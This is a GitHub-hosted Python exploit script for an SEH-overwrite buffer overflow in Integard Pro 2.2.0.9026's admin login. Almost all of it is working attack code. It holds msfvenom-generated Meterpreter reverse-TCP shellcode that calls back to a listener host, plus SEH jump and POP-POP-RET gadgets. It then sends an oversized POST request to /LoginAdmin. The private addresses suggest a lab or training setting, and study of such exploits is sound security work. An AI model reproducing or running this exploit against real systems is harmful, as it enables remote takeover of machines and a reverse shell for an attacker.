-
Notifications
You must be signed in to change notification settings - Fork 5
/
integard.py
83 lines (74 loc) · 3.46 KB
/
integard.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#!/usr/bin/python
#################################################
#~Integard Pro 2.2.0.9026 SEH overwrite exploit~#
#~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~#
#################################################
import socket
import os
import sys
from struct import pack
host = "10.0.0.130"
port = 18881
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=443
#-b "\x00, \x20, \x26, \x2f \x3d, \x3f, \x5c" EXITFUNC=thread -f python
# Payload size: 366 bytes
buf = ""
buf += "\x6a\x56\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
buf += "\xe2\xed\x88\x9e\x83\xeb\xfc\xe2\xf4\x1e\x05\x0a\x9e"
buf += "\xe2\xed\xe8\x17\x07\xdc\x48\xfa\x69\xbd\xb8\x15\xb0"
buf += "\xe1\x03\xcc\xf6\x66\xfa\xb6\xed\x5a\xc2\xb8\xd3\x12"
buf += "\x24\xa2\x83\x91\x8a\xb2\xc2\x2c\x47\x93\xe3\x2a\x6a"
buf += "\x6c\xb0\xba\x03\xcc\xf2\x66\xc2\xa2\x69\xa1\x99\xe6"
buf += "\x01\xa5\x89\x4f\xb3\x66\xd1\xbe\xe3\x3e\x03\xd7\xfa"
buf += "\x0e\xb2\xd7\x69\xd9\x03\x9f\x34\xdc\x77\x32\x23\x22"
buf += "\x85\x9f\x25\xd5\x68\xeb\x14\xee\xf5\x66\xd9\x90\xac"
buf += "\xeb\x06\xb5\x03\xc6\xc6\xec\x5b\xf8\x69\xe1\xc3\x15"
buf += "\xba\xf1\x89\x4d\x69\xe9\x03\x9f\x32\x64\xcc\xba\xc6"
buf += "\xb6\xd3\xff\xbb\xb7\xd9\x61\x02\xb2\xd7\xc4\x69\xff"
buf += "\x63\x13\xbf\x85\xbb\xac\xe2\xed\xe0\xe9\x91\xdf\xd7"
buf += "\xca\x8a\xa1\xff\xb8\xe5\x64\x60\x61\x32\x55\x18\x9f"
buf += "\xe2\xed\xa1\x5a\xb6\xbd\xe0\xb7\x62\x86\x88\x61\x37"
buf += "\x87\x82\xf6\xe8\xed\x88\x1e\x8a\xef\x88\x9f\x59\x64"
buf += "\x6e\xce\xb2\xbd\xd8\xde\xb2\xad\xd8\xf6\x08\xe2\x57"
buf += "\x7e\x1d\x38\x1f\xf4\xf2\xbb\xdf\xf6\x7b\x48\xfc\xff"
buf += "\x1d\x38\x0d\x5e\x96\xe7\x77\xd0\xea\x98\x64\x76\x85"
buf += "\xed\x88\x9e\x88\xed\xe2\x9a\xb4\xba\xe0\x9c\x3b\x25"
buf += "\xd7\x61\x37\x6e\x70\x9e\x9c\xdb\x03\xa8\x88\xad\xe0"
buf += "\x9e\xf2\xed\x88\xc8\x88\xed\xe0\xc6\x46\xbe\x6d\x61"
buf += "\x37\x7e\xdb\xf4\xe2\xbb\xdb\xc9\x8a\xef\x51\x56\xbd"
buf += "\x12\x5d\x1d\x1a\xed\xf5\xb6\xba\x85\x88\xde\xe2\xed"
buf += "\xe2\x9e\xb2\x85\x83\xb1\xed\xdd\x77\x4b\xb5\x85\xfd"
buf += "\xf0\xaf\x8c\x77\x4b\xbc\xb3\x77\x92\xc6\xe2\x0d\xee"
buf += "\x1d\x12\x77\x77\x79\x12\x77\x61\xe3\x2e\xa1\x58\x97"
buf += "\x2c\x4b\x25\x1c\xe3\xba\x74\x88\xed\xdb\x61\x37\x87"
buf += "\x88\x5d"
# POP POP RET in integard.exe
nSeh = "\xEB\xd0\x90\x90" # JMP 48 bytes backwards
Seh = pack("<L", 0x004042B0)
jumpCall = "\xeb\x09" #JMP 11 bytes forward to hit the CALL in bigBackJump
# Decrement ECX by 768 bytes and jump to it
bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"
crash = "\x90" * (3096 - len(jumpCall) -len(bigBackJump) -len(buf) - 50)
crash += buf
crash += "\x90" * 50
crash += jumpCall
crash += bigBackJump
crash += nSeh
crash += Seh
buffer = ""
buffer += "POST /LoginAdmin HTTP/1.1\r\n"
buffer += "Host: 10.0.0.130:18881\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer += "Accept-Language: en-US,en;q=0.5\r\n"
buffer += "Accept-Encoding: gzip, deflate\r\n"
buffer += "Referer: http://10.0.0.130:18881/\r\n"
buffer += "Connection: close\r\n"
buffer += "Upgrade-Insecure-Requests: 1\r\n"
buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
buffer += "Content-Length: 78\r\n\r\n"
buffer += "Password=" + crash + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(buffer)
s.close()